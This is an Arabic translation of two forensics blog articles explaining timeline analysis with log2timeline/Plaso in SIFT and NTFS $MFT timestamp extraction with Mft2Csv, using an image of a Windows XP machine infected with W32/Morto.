بعد الانتهاء من عملية اخذ صورة من الدليل ( النظام الذي سوف يتم تحليله جنائيا)  تبدا مرحلة تحليل النظام بأنشاء تسلسل زمني للاحداث في النظام  . هذه المرحله مهمه جدا ومفيده لمعرفة التسلسل الزمني للتعديلات التي حصلت للنظام والملفات من اضافة وتعديل وحذف بشكل يمكنك تحليله هذه الطريقة تسمى time line analysis كنا قد وضحناها في فيديو سابق . التسلسل الزمني للملفات يتم انشائه باستخدام بعض الادوات التي تقوم باستخراج metadata من الملفات ( inode في لينكس او سجلات MFT في وندوز ) ثم يتم حفظ هذه البيانات وترتيبها وتحليلها . الهدف هو انشاء تسلسل زمني يمكن الاطلاع عليه ومعرفه اخر الملفات التي حصل لها تغييرات في النظام , يمكن عمل هذا النوع من التحليلات باستخدام ادوات مجانيه و مفتوحه المصدر مثل SIFT .

في 2010 , الباحث الامني Kristinn Gudjonsson قام بنشر ورقة في reading room في موقع SANS عن طريقة لبناء تسلسل زمني تدعى super timeline باستخدام اداة اسمها log2timeline , الطريقة نوعا ما  اكثر من مجرد جمع معلومات metadata من الملفات , حسب ما نشره Kristinn العملية تعتمد على مجموعه من artifacts  لأستخراج التسلسل الزمني للاحداث في النظام  ليس فقط metadata . لعمل التحليل يمكن استخدام اداة log2timeline والتي كانت مكتوبة بلغة perl .

الاداة تم تطويرها بحيث يمكن المشاركة والاضافة لها مهام اخرى عن طريقة اضافات خاصة تقوم بتحليلات لملفات معينة على سبيل المثال .

حاليا الاداة تم تطويرها ووضعها في بيئة عمل اسمها Plaso مكتوبة بلغة البايثون وتم اضافة اداوات اخرى ايضا .

دعونا نقوم بأنشاء تسلسل زمني لنظام وندوز اكس بي , هذا الجهاز تم اصابته بملف خبيث يدعى w32/Morto , سوف يتم استخدام SIFT في التحليل.

خمس خطوات للقيام بالعملية موضحه في الصورة التاليه :

قمنا باستخدام اداة log2timeline.py والتي جزء من مشروع Palso suite .

الخطوات حسب الترقيم في الصورة كالتالي :

1- قمنا بإبجاد الـ starting sector لقرص NTFS الخاص بالجهاز باستخدام اداة mmls

2- قمنا بعمل mount في وضع القراءة فقط .

3- استخدمنا اداة log2timeline لانشاء ملف التسلسل الزمني للملفات

4- ترتيب الاحداث الزمنيه وحفظها في ملف CSV

5- استخدمنا امر l2t_process لمعالجة ملف CSV بعد انشائه باداة log2timeline

الان اصبح لدينا ملف يحتوي على معلومات عن التسلسل الزمني لكل الملفات ويمكننا البدء في عملية التحليل

العملية سهلة للغاية ويمكن عملها لكل انظمه وندوز ,  الان لديك مصدر معلومات يدلك على الاحداث التي حصلت للنظام في وقت معين , يمكنك الاطلاع على على دليل اداة log2timeline  من هنا ومعرفة المزيد عن هذ النوع من التحليلات .

ترجمة : لمقال FORENSICS EVIDENCE PROCESSING – SUPER TIMELINE

في مقالة سابقة تعرفنا على super timeline وعرفنا ان هذا النوع من التحليل الزمني لا يعتمد فقط على metadata الخاص بالملفات وانما على اكثر من مصدر لبناء التسلسل الزمني للاحداث الخاص بالدليل . في هذه المقالة سوف نتعرف على كيفية بناء تسلسل زمني للاحداث في النظام ولكن خاص بأقراص NTFS والاستفاده من MFT$ الموجود في اقراص NTFS . هذا الملف يعتبر كنز من المعلومات للمحقيق الجنائيين لانه يحتوي على كل معلومات الملفات الموجوده داخل القرص ولايمكن الوصول اليه في الوضع الاعتيادي

في حالتنا لدينا وصول الى هذا الملف من خلال صورة النظام التي تم اخذها في مرحله Image Acquisition . السجلات في ملف MFT$ تكون active في حالة وجود الملف وتصبح inactive اذا تم حذف الملف

الصورة التاليه توضح سجل من سجلات ملف MFT$ باستخدام istat في SIFT, الرقم 0 في اخر الامر المستخدم داخل الصوره هو رقم السجل المراد عرضة ابتداً من offset 206848  .

كل سجل يحتوي على مجموعه من المعلومات الخاصه بالملفات  من اهم هذه المعلومات هي

• STANDART_INFORMATION$
• FILENAME$
• DATA$

اول اثنين يحتويان على time stamps (معلومات التاريخ والوقت الخاصه بالملفات ) , كل ملف يحتوي على 8 معلومات عن الوقت والتاريخ اربعة منهم في STANDARD_INFORMATION$ واربعة اخرى في FILENAME$ هذه المعلومات معروفة بـ MACE .

•   Modfied وهي معلومات الوقت الخاصة باخر تعديل على الملف يرمز لها بحرف M
• Accessed وهي معلومات الوقت الخاصة باخر وقت تم قراءة الملف  ويرمز لها بحرف A
• Created وهي معلومات الوقت الخاصه بوقت انشاء الملف ويرمز لها بحرف C
• Entry Modified وتعني معلومات وقت اخر مره سجل MFT$ تم تعديله ويرمز لها بحرف  E

الان  بعد معرفة بعض المعلومات عن MFT$ والتي تعتبر كافية  يمكن البدء بتمرين عملي لتحليل قرص NTFS

نحتاج الى SIFT وبداخله صورة الدليل , سوف نستخدم اداة Mft2Csv لـ Joakim Schicht والتي تساعدنا في استخراج المعلومات من MFT$ .

سوف نقوم بعمل تعديل بسيط على SMB deamon لكي نجعل الصوره الخاصه بالدليل متوفره من خلال الشبكة باستخدام SMB .

كما هو موضح في الصوره اضفنا السطر الاخير لمشاركة الصوره الموصوله .

الان من خلال جهاز يعمل بنظام وندوز موجود في نفس الشبكة الموجود فيها SIFT Workstation يمكننا عرض والوصول الى الصوره من خلال CMD .

سوف نستخدم قرص Z للوصول الى الصوره , الان سوف نستخدم اداة  Mft2Csv الاداة لديها القدره لقراءة ملف MFT$ تعمل الادة في انظمه وندوز ولديها واجهة رسومية الاصدار الحالي هو v2.0.0.33

سوف نستخدم الامر التالي :

Mft2Csv.exe /MftFile:Z:\$MFT /TimeZone:0.00 /OutputFormat:l2t

الامر واضح حيث تم تحديد القرص الموجوده فيه الصوره والـ time zone .

عند الانتهاء من انشاء الملف يمكن فتحه باستخدام Excel وتحليل التسلسل الزمني .

ترجمة لمقال : DIGITAL FORENSICS – NTFS METADATA TIMELINE CREATION